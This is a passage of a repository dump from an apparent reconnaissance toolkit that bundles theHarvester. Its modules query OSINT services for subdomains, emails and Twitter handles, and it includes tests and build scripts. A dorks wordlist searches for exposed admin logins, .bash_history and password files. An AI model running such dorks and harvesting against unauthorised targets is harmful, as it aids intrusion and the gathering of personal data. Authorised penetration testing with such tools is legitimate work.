59 | self.totalhosts.add(host[1:] if host[0] == '.' else host)
60 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/threatcrowd.py:
--------------------------------------------------------------------------------
1 | from typing import Coroutine
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
4 |
5 |
6 | class SearchThreatcrowd:
7 |
8 | def __init__(self, word):
9 | self.word = word.replace(' ', '%20')
10 | self.results: str = ""
11 | self.totalresults: str = ""
12 | self.proxy = False
13 |
14 | async def do_search(self):
15 | base_url = f'https://www.threatcrowd.org/searchApi/v2/domain/report/?domain={self.word}'
16 | headers = {'User-Agent': Core.get_user_agent()}
17 | try:
18 | responses = await AsyncFetcher.fetch_all([base_url], headers=headers, proxy=self.proxy)
19 | self.results = responses[0]
20 | except Exception as e:
21 | print(e)
22 | self.totalresults += self.results
23 |
24 | async def get_hostnames(self) -> Coroutine:
25 | return await myparser.Parser(self.results, self.word).hostnames()
26 |
27 | async def process(self, proxy=False):
28 | self.proxy = proxy
29 | await self.do_search()
30 | await self.get_hostnames()
31 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/threatminer.py:
--------------------------------------------------------------------------------
1 | from typing import Type
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 |
4 |
5 | class SearchThreatminer:
6 |
7 | def __init__(self, word):
8 | self.word = word
9 | self.totalhosts = list
10 | self.proxy = False
11 |
12 | async def do_search(self):
13 | url = f'https://api.threatminer.org/v2/domain.php?q={self.word}&rt=5'
14 | response = await AsyncFetcher.fetch_all([url], json=True, proxy=self.proxy)
15 | self.totalhosts: set = {host for host in response[0]['results']}
16 |
17 | async def get_hostnames(self) -> Type[list]:
18 | return self.totalhosts
19 |
20 | async def process(self, proxy=False):
21 | self.proxy = proxy
22 | await self.do_search()
23 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/twittersearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
4 | import re
5 |
6 |
7 | class SearchTwitter:
8 |
9 | def __init__(self, word, limit):
10 | self.word = word.replace(' ', '%20')
11 | self.results = ""
12 | self.totalresults = ""
13 | self.server = 'www.google.com'
14 | self.quantity = '100'
15 | self.limit = int(limit)
16 | self.counter = 0
17 | self.proxy = False
18 |
19 | async def do_search(self):
20 | base_url = f'https://{self.server}/search?num=100&start=xx&hl=en&meta=&q=site%3Atwitter.com%20intitle%3A%22on+Twitter%22%20{self.word}'
21 | headers = {'User-Agent': Core.get_user_agent()}
22 | try:
23 | urls = [base_url.replace("xx", str(num)) for num in range(0, self.limit, 10) if num <= self.limit]
24 | for url in urls:
25 | response = await AsyncFetcher.fetch_all([url], headers=headers, proxy=self.proxy)
26 | self.results = response[0]
27 | if await search(self.results):
28 | try:
29 | self.results = await google_workaround(url)
30 | if isinstance(self.results, bool):
31 | print('Google is blocking your ip and the workaround, returning')
32 | return
33 | except Exception:
34 | # google blocked, no useful result
35 | return
36 | self.totalresults += self.results
37 | except Exception as error:
38 | print(error)
39 |
40 | async def get_people(self, proxy=False):
41 | self.proxy = proxy
42 | rawres = myparser.Parser(self.totalresults, self.word)
43 | to_parse = await rawres.people_twitter()
44 | # fix invalid handles that look like @user other_output
45 | handles = set()
46 | for handle in to_parse:
47 | result = re.search(r'^@?(\w){1,15}', handle)
48 | if result:
49 | handles.add(result.group(0))
50 | return handles
51 |
52 | async def process(self):
53 | await self.do_search()
54 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/urlscan.py:
--------------------------------------------------------------------------------
1 | from typing import Type
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 |
4 |
5 | class SearchUrlscan:
6 | def __init__(self, word):
7 | self.word = word
8 | self.totalhosts = list
9 | self.totalips = list
10 | self.proxy = False
11 |
12 | async def do_search(self):
13 | url = f'https://urlscan.io/api/v1/search/?q=domain:{self.word}'
14 | response = await AsyncFetcher.fetch_all([url], json=True, proxy=self.proxy)
15 | resp = response[0]
16 | self.totalhosts = {f"{page['page']['domain']}" for page in resp['results']}
17 | self.totalips = {f"{page['page']['ip']}" for page in resp['results'] if 'ip' in page['page'].keys()}
18 |
19 | async def get_hostnames(self) -> Type[list]:
20 | return self.totalhosts
21 |
22 | async def get_ips(self) -> Type[list]:
23 | return self.totalips
24 |
25 | async def process(self, proxy=False):
26 | self.proxy = proxy
27 | await self.do_search()
28 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/virustotal.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
3 | import re
4 |
5 |
6 | class SearchVirustotal:
7 |
8 | def __init__(self, word):
9 | self.word = word
10 | self.results = ""
11 | self.totalresults = ""
12 | self.quantity = '100'
13 | self.counter = 0
14 | self.proxy = False
15 |
16 | async def do_search(self):
17 | base_url = f'https://www.virustotal.com/ui/domains/{self.word}/subdomains?relationships=resolutions&cursor=STMwCi4%3D&limit=40'
18 | headers = {'User-Agent': Core.get_user_agent()}
19 | responses = await AsyncFetcher.fetch_all([base_url], headers=headers, proxy=self.proxy)
20 | self.results = responses[0]
21 | self.totalresults += self.results
22 |
23 | async def get_hostnames(self):
24 | rawres = myparser.Parser(self.results, self.word)
25 | new_lst = []
26 | for host in await rawres.hostnames():
27 | host = str(host)
28 | if host[0].isdigit():
29 | matches = re.match('.+([0-9])[^0-9]*$', host)
30 | # Get last digit of string and shift hostname to remove ip in string
31 | new_lst.append(host[matches.start(1) + 1:])
32 | else:
33 | new_lst.append(host)
34 | return new_lst
35 |
36 | async def process(self, proxy=False):
37 | self.proxy = proxy
38 | print('\tSearching results.')
39 | await self.do_search()
40 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/yahoosearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
3 |
4 |
5 | class SearchYahoo:
6 |
7 | def __init__(self, word, limit):
8 | self.word = word
9 | self.total_results = ""
10 | self.server = 'search.yahoo.com'
11 | self.limit = limit
12 | self.proxy = False
13 |
14 | async def do_search(self):
15 | base_url = f'https://{self.server}/search?p=%40{self.word}&b=xx&pz=10'
16 | headers = {
17 | 'Host': self.server,
18 | 'User-agent': Core.get_user_agent()
19 | }
20 | urls = [base_url.replace("xx", str(num)) for num in range(0, self.limit, 10) if num <= self.limit]
21 | responses = await AsyncFetcher.fetch_all(urls, headers=headers, proxy=self.proxy)
22 | for response in responses:
23 | self.total_results += response
24 |
25 | async def process(self):
26 | await self.do_search()
27 |
28 | async def get_emails(self):
29 | rawres = myparser.Parser(self.total_results, self.word)
30 | toparse_emails = await rawres.emails()
31 | emails = set()
32 | # strip out numbers and dashes for emails that look like xxx-xxx-xxxemail@host.tld
33 | for email in toparse_emails:
34 | email = str(email)
35 | if '-' in email and email[0].isdigit() and email.index('-') <= 9:
36 | while email[0] == '-' or email[0].isdigit():
37 | email = email[1:]
38 | emails.add(email)
39 | return list(emails)
40 |
41 | async def get_hostnames(self, proxy=False):
42 | self.proxy = proxy
43 | rawres = myparser.Parser(self.total_results, self.word)
44 | return await rawres.hostnames()
45 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/lib/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ['hostchecker']
2 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/lib/hostchecker.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | """
4 | Created by laramies on 2008-08-21.
5 | Revised to use aiodns & asyncio on 2019-09-23
6 | """
7 |
8 | import aiodns
9 | import asyncio
10 | import socket
11 | from typing import Tuple, Any
12 |
13 |
14 | class Checker:
15 |
16 | def __init__(self, hosts: list, nameserver=False):
17 | self.hosts = hosts
18 | self.realhosts: list = []
19 | self.addresses: set = set()
20 | self.nameserver = []
21 | if nameserver:
22 | self.nameserver = nameserver
23 |
24 | @staticmethod
25 | async def query(host, resolver) -> Tuple[str, Any]:
26 | try:
27 | result = await resolver.gethostbyname(host, socket.AF_INET)
28 | addresses = result.addresses
29 | if addresses == [] or addresses is None or result is None:
30 | return f"{host}:", tuple()
31 | else:
32 | return f"{host}:{', '.join(map(str, addresses))}", addresses
33 | except Exception:
34 | return f"{host}", tuple()
35 |
36 | async def query_all(self, resolver) -> list:
37 | results = await asyncio.gather(*[asyncio.create_task(self.query(host, resolver))
38 | for host in self.hosts])
39 | return results
40 |
41 | async def check(self):
42 | loop = asyncio.get_event_loop()
43 | resolver = aiodns.DNSResolver(loop=loop, timeout=4) if len(self.nameserver) == 0\
44 | else aiodns.DNSResolver(loop=loop, timeout=4, nameservers=self.nameserver)
45 | results = await self.query_all(resolver)
46 | for host, address in results:
47 | self.realhosts.append(host)
48 | self.addresses.update({addr for addr in address})
49 | # address may be a list of ips
50 | # and do a set comprehension to remove duplicates
51 | self.realhosts.sort()
52 | self.addresses = list(self.addresses)
53 | return self.realhosts, self.addresses
54 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/parsers/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/parsers/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/parsers/intelxparser.py:
--------------------------------------------------------------------------------
1 | class Parser:
2 |
3 | def __init__(self):
4 | self.emails = set()
5 | self.hosts = set()
6 |
7 | async def parse_dictionaries(self, results: dict) -> tuple:
8 | """
9 | Parse method to parse json results
10 | :param results: Dictionary containing a list of dictionaries known as selectors
11 | :return: tuple of emails and hosts
12 | """
13 | if results is not None:
14 | for dictionary in results["selectors"]:
15 | field = dictionary['selectorvalue']
16 | if '@' in field:
17 | self.emails.add(field)
18 | else:
19 | field = str(field)
20 | if 'http' in field or 'https' in field:
21 | if field[:5] == 'https':
22 | field = field[8:]
23 | else:
24 | field = field[7:]
25 | self.hosts.add(field.replace(')', '').replace(',', ''))
26 | return self.emails, self.hosts
27 | return None, None
28 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/parsers/securitytrailsparser.py:
--------------------------------------------------------------------------------
1 | from typing import Union, Tuple, List
2 |
3 |
4 | class Parser:
5 |
6 | def __init__(self, word, text):
7 | self.word = word
8 | self.text = text
9 | self.hostnames = set()
10 | self.ips = set()
11 |
12 | async def parse_text(self) -> Union[List, Tuple]:
13 | sub_domain_flag = 0
14 | self.text = str(self.text).splitlines()
15 | # Split lines to get a list of lines.
16 | for index in range(0, len(self.text)):
17 | line = self.text[index].strip()
18 | if '"ip":' in line:
19 | # Extract IP.
20 | ip = ''
21 | for ch in line[7:]:
22 | if ch == '"':
23 | break
24 | else:
25 | ip += ch
26 | self.ips.add(ip)
27 | elif '"subdomains":' in line:
28 | # subdomains start here so set flag to 1
29 | sub_domain_flag = 1
30 | continue
31 | elif sub_domain_flag > 0:
32 | if ']' in line:
33 | sub_domain_flag = 0
34 | else:
35 | if 'www' in self.word:
36 | self.word = str(self.word).replace('www.', '').replace('www', '')
37 | # Remove www from word if entered
38 | self.hostnames.add(str(line).replace('"', '').replace(',', '') + '.' + self.word)
39 | else:
40 | continue
41 | return list(self.ips), list(self.hostnames)
42 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/setup.cfg:
--------------------------------------------------------------------------------
1 | [flake8]
2 | ignore = E501, F405, F403, E402
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/setup.py:
--------------------------------------------------------------------------------
1 | import setuptools
2 | from theHarvester.lib.core import Core
3 |
4 | with open('README.md', 'r') as fh:
5 | long_description = fh.read()
6 |
7 | setuptools.setup(
8 | name='theHarvester',
9 | version=Core.version(),
10 | author="Christian Martorella",
11 | author_email="cmartorella@edge-security.com",
12 | description="theHarvester is a very simple, yet effective tool designed to be used in the early stages of a penetration test",
13 | long_description=long_description,
14 | long_description_content_type="text/markdown",
15 | url="https://github.com/laramies/theHarvester",
16 | packages=setuptools.find_packages(exclude=['tests']),
17 | entry_points={
18 | 'console_scripts': [
19 | 'theHarvester = theHarvester.__main__:entry_point'
20 | ]
21 | },
22 |
23 | classifiers=[
24 | "Programming Language :: Python :: 3",
25 | "Programming Language :: Python :: 3.7",
26 | "Programming Language :: Python :: 3.8",
27 | "License :: OSI Approved :: GNU General Public License v2 (GPLv2)",
28 | "Operating System :: OS Independent",
29 | ],
30 | data_files=[
31 | ('/etc/theHarvester', [
32 | 'wordlists/general/common.txt',
33 | 'wordlists/dns-big.txt',
34 | 'wordlists/dns-names.txt',
35 | 'wordlists/dorks.txt',
36 | 'wordlists/names_small.txt',
37 | 'api-keys.yaml',
38 | 'proxies.yaml'
39 | ]
40 | )
41 | ],
42 | )
43 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/theHarvester/tests/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/discovery/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/theHarvester/tests/discovery/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/discovery/test_certspotter.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding=utf-8
3 | from theHarvester.lib.core import *
4 | from theHarvester.discovery import certspottersearch
5 | import requests
6 | import pytest
7 |
8 | pytestmark = pytest.mark.asyncio
9 |
10 |
11 | class TestCertspotter(object):
12 | @staticmethod
13 | def domain() -> str:
14 | return 'metasploit.com'
15 |
16 | async def test_api(self):
17 | base_url = f'https://api.certspotter.com/v1/issuances?domain={TestCertspotter.domain()}&expand=dns_names'
18 | headers = {'User-Agent': Core.get_user_agent()}
19 | request = requests.get(base_url, headers=headers)
20 | assert request.status_code == 200
21 |
22 | async def test_search(self):
23 | search = certspottersearch.SearchCertspoter(TestCertspotter.domain())
24 | await search.process()
25 | assert isinstance(await search.get_hostnames(), set)
26 |
27 | async def test_search_no_results(self):
28 | search = certspottersearch.SearchCertspoter('radiant.eu')
29 | await search.process()
30 | assert len(await search.get_hostnames()) == 0
31 |
32 |
33 | if __name__ == '__main__':
34 | pytest.main()
35 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/discovery/test_linkedin_links.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding=utf-8
3 | from theHarvester.discovery import linkedinsearch
4 | from theHarvester.discovery.constants import splitter
5 | import os
6 | import re
7 | import pytest
8 |
9 | pytestmark = pytest.mark.asyncio
10 |
11 |
12 | class TestGetLinks(object):
13 |
14 | async def test_splitter(self):
15 | results = [
16 | 'https://www.linkedin.com/in/don-draper-b1045618',
17 | 'https://www.linkedin.com/in/don-draper-b59210a',
18 | 'https://www.linkedin.com/in/don-draper-b5bb50b3',
19 | 'https://www.linkedin.com/in/don-draper-b83ba26',
20 | 'https://www.linkedin.com/in/don-draper-b854a51'
21 | ]
22 | filtered_results = await splitter(results)
23 | assert len(filtered_results) == 1
24 |
25 | async def test_get_links(self):
26 | search = linkedinsearch.SearchLinkedin("facebook.com", '100')
27 | await search.process()
28 | links = await search.get_links()
29 | assert isinstance(links, list)
30 |
31 | async def test_links_linkedin(self):
32 | dir_path = os.path.dirname(os.path.realpath(__file__))
33 | mock_response = open(dir_path + "/test_linkedin_links.txt")
34 | mock_response_content = mock_response.read()
35 | mock_response.close()
36 | reg_links = re.compile(r"url=https:\/\/www\.linkedin.com(.*?)&")
37 | temp = reg_links.findall(mock_response_content)
38 | resul = []
39 | for regex_item in temp:
40 | stripped_url = regex_item.replace("url=", "")
41 | resul.append("https://www.linkedin.com" + stripped_url)
42 | assert set(resul)
43 |
44 |
45 | if __name__ == '__main__':
46 | pytest.main()
47 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/discovery/test_otx.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding=utf-8
3 | from theHarvester.lib.core import *
4 | from theHarvester.discovery import otxsearch
5 | import requests
6 | import pytest
7 |
8 | pytestmark = pytest.mark.asyncio
9 |
10 |
11 | class TestOtx(object):
12 | @staticmethod
13 | def domain() -> str:
14 | return 'metasploit.com'
15 |
16 | async def test_api(self):
17 | base_url = f'https://otx.alienvault.com/api/v1/indicators/domain/{TestOtx.domain()}/passive_dns'
18 | headers = {'User-Agent': Core.get_user_agent()}
19 | request = requests.get(base_url, headers=headers)
20 | assert request.status_code == 200
21 |
22 | async def test_search(self):
23 | search = otxsearch.SearchOtx(TestOtx.domain())
24 | await search.process()
25 | assert isinstance(await search.get_hostnames(), set)
26 |
27 | async def test_search_no_results(self):
28 | search = otxsearch.SearchOtx('radiant.eu')
29 | await search.process()
30 | assert len(await search.get_hostnames()) == 0
31 |
32 |
33 | if __name__ == '__main__':
34 | pytest.main()
35 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/discovery/test_sublist3r.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding=utf-8
3 | import requests
4 | from theHarvester.lib.core import *
5 | from theHarvester.discovery import sublist3r
6 | import pytest
7 |
8 | pytestmark = pytest.mark.asyncio
9 |
10 |
11 | class TestSublist3r(object):
12 | @staticmethod
13 | def domain() -> str:
14 | return 'target.com'
15 |
16 | async def test_api(self):
17 | base_url = f'https://api.sublist3r.com/search.php?domain={TestSublist3r.domain()}'
18 | headers = {'User-Agent': Core.get_user_agent()}
19 | request = requests.get(base_url, headers=headers)
20 | assert request.status_code == 200
21 |
22 | async def test_search(self):
23 | search = sublist3r.SearchSublist3r(TestSublist3r.domain())
24 | await search.process()
25 | assert isinstance(await search.get_hostnames(), list)
26 |
27 |
28 | if __name__ == '__main__':
29 | pytest.main()
30 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/discovery/test_threatminer.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding=utf-8
3 | import requests
4 | from theHarvester.lib.core import *
5 | from theHarvester.discovery import threatminer
6 | import pytest
7 |
8 | pytestmark = pytest.mark.asyncio
9 |
10 |
11 | class TestThreatminer(object):
12 | @staticmethod
13 | def domain() -> str:
14 | return 'target.com'
15 |
16 | async def test_api(self):
17 | base_url = f'https://api.sublist3r.com/search.php?domain={TestThreatminer.domain()}'
18 | headers = {'User-Agent': Core.get_user_agent()}
19 | request = requests.get(base_url, headers=headers)
20 | assert request.status_code == 200
21 |
22 | async def test_search(self):
23 | search = threatminer.SearchThreatminer(TestThreatminer.domain())
24 | await search.process()
25 | assert isinstance(await search.get_hostnames(), set)
26 |
27 |
28 | if __name__ == '__main__':
29 | pytest.main()
30 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/test_myparser.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding=utf-8
3 |
4 | from theHarvester.parsers import myparser
5 | import pytest
6 |
7 |
8 | class TestMyParser(object):
9 |
10 | @pytest.mark.asyncio
11 | async def test_emails(self):
12 | word = 'domain.com'
13 | results = '@domain.com***a@domain***banotherdomain.com***c@domain.com***d@sub.domain.com***'
14 | parse = myparser.Parser(results, word)
15 | emails = sorted(await parse.emails())
16 | assert emails, ['c@domain.com', 'd@sub.domain.com']
17 |
18 |
19 | if __name__ == '__main__':
20 | pytest.main()
21 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/theHarvester-logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/theHarvester/theHarvester-logo.png
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/theHarvester.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | # Note: This script runs theHarvester
4 | from platform import python_version
5 | import sys
6 | import asyncio
7 | import uvloop
8 | # from theHarvester import __main__
9 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester import __main__
10 |
11 | def run_theHarvester(domain):
12 | uvloop.install()
13 | # all_ip, all_emails, all_hosts = asyncio.run(__main__.entry_point(domain))
14 | return asyncio.run(__main__.entry_point(domain))
15 |
16 |
17 | if __name__ == "__main__":
18 | domains = ['']
19 | for domain in domains:
20 | run_theHarvester(domain)
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/wordlists/dorks.txt:
--------------------------------------------------------------------------------
1 | login.html
2 | administrator/login.%XT%
3 | admin_area/login.%XT%
4 | intext:@
5 | inurl:
6 | intitle:
7 | intext:
8 | sysadm/
9 | administratoraccounts/
10 | usr/
11 | root/
12 | secret/
13 | admin/login.%XT%
14 | moderator/login.%XT%
15 | login%XT%
16 | logout%XT%
17 | super_index%XT%
18 | super_login%XT%
19 | supermanager%XT%
20 | superuser%XT%
21 | inurl:/publications.asp?type=
22 | intitle:"Index of" .bash_history
23 | intitle:"index of" members OR accounts
24 | inurl:section.php?id=
25 | =inurl:/filedown.php?file=
26 | inurl:/shared/help.php?page=
27 | inurl:index.php?load=
28 | inurl:home.php?pagina=
29 | index.php?mode=
30 | intitle:"index of" +myd size
31 | inurl:public
32 | intitle:index.of inbox
33 | intext:"Storage Management Server for" intitle:"Server Administration"
34 | inurl:"gs/adminlogin.aspx"
35 | "http://*:*@www"
36 | =enable password | secret "current configuration" -intext:the
37 | wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
38 | robots.txt
39 | php-addressbook "This is the addressbook for *" -warning
40 | intitle:"index of" members OR accounts
41 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/wordlists/general/common.txt:
--------------------------------------------------------------------------------
1 | admin
2 | test
3 | hello
4 | uk
5 | login
6 | book
7 | robots.txt
8 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/verifyEmails/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/verifyEmails/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/webDetect/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/webDetect/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/webDetect/demo.py:
--------------------------------------------------------------------------------
1 | from Wappalyzer import Wappalyzer, WebPage
2 | wappalyzer = Wappalyzer.latest()
3 | webpage = WebPage.new_from_url('http://www.baidu.com')
4 | wappalyzer.analyze(webpage)
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/webDetect/result.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/webDetect/result.txt
--------------------------------------------------------------------------------
/Plugins/infoGather/webInfo/Wappalyzer/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/webInfo/Wappalyzer/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/webInfo/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/webInfo/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/webInfo/getWebInfo.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.webInfo.Wappalyzer.Wappalyzer import Wappalyzer, WebPage
2 | import warnings
3 | warnings.filterwarnings('ignore')
4 | import requests
5 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
6 | # 禁用安全请求警告
7 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
8 |
9 | wappalyzer = Wappalyzer.latest()
10 |
11 | def run_getWebInfo(url):
12 | try:
13 | webpage = WebPage.new_from_url(url=url, verify=False)
14 | info = wappalyzer.analyze(webpage)
15 | # content = '[{}] : {}'.format(url, info)
16 | if len(info) > 0:
17 | return str(info)
18 | # print('\t[+]{}'.format(content))
19 | except Exception:
20 | pass
21 | return None
22 |
23 | if __name__ == '__main__':
24 | url = r''
25 | info = run_getWebInfo(url)
26 | print(info)
--------------------------------------------------------------------------------
/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/__init__.py
--------------------------------------------------------------------------------
/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | apt install python3 -y
3 | apt install python3-pip --fix-missing -y
4 | apt install python3-setuptools -y
5 | apt install tmux -y
6 | python3 -m pip install --upgrade pip
7 | python3 -m pip install openpyxl==2.6.4
8 | python3 -m pip install Cython
9 | python3 -m pip install -r requirements.txt
10 | chmod 777 ./Plugins/infoGather/subdomain/ksubdomain/ksubdomain_linux
11 |
--------------------------------------------------------------------------------
/docker_build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | apt install python3-setuptools -y
3 | python3 -m pip install -r requirements.txt
4 | chmod 777 ./Plugins/infoGather/subdomain/ksubdomain/ksubdomain_linux
--------------------------------------------------------------------------------
/imgs/0x727.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/0x727.png
--------------------------------------------------------------------------------
/imgs/ObserverWard1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/ObserverWard1.png
--------------------------------------------------------------------------------
/imgs/aiqicha.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/aiqicha.png
--------------------------------------------------------------------------------
/imgs/banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/banner.png
--------------------------------------------------------------------------------
/imgs/github_auther.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/github_auther.png
--------------------------------------------------------------------------------
/imgs/hostCollide.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/hostCollide.png
--------------------------------------------------------------------------------
/imgs/image-20210728132105833.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728132105833.png
--------------------------------------------------------------------------------
/imgs/image-20210728132752381.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728132752381.png
--------------------------------------------------------------------------------
/imgs/image-20210728133047590.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728133047590.png
--------------------------------------------------------------------------------
/imgs/image-20210728134051049.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728134051049.png
--------------------------------------------------------------------------------
/imgs/image-20210728134115608.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728134115608.png
--------------------------------------------------------------------------------
/imgs/image-20210728134131076.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728134131076.png
--------------------------------------------------------------------------------
/imgs/image-20210728134212279.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728134212279.png
--------------------------------------------------------------------------------
/imgs/image-20210728134304533.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728134304533.png
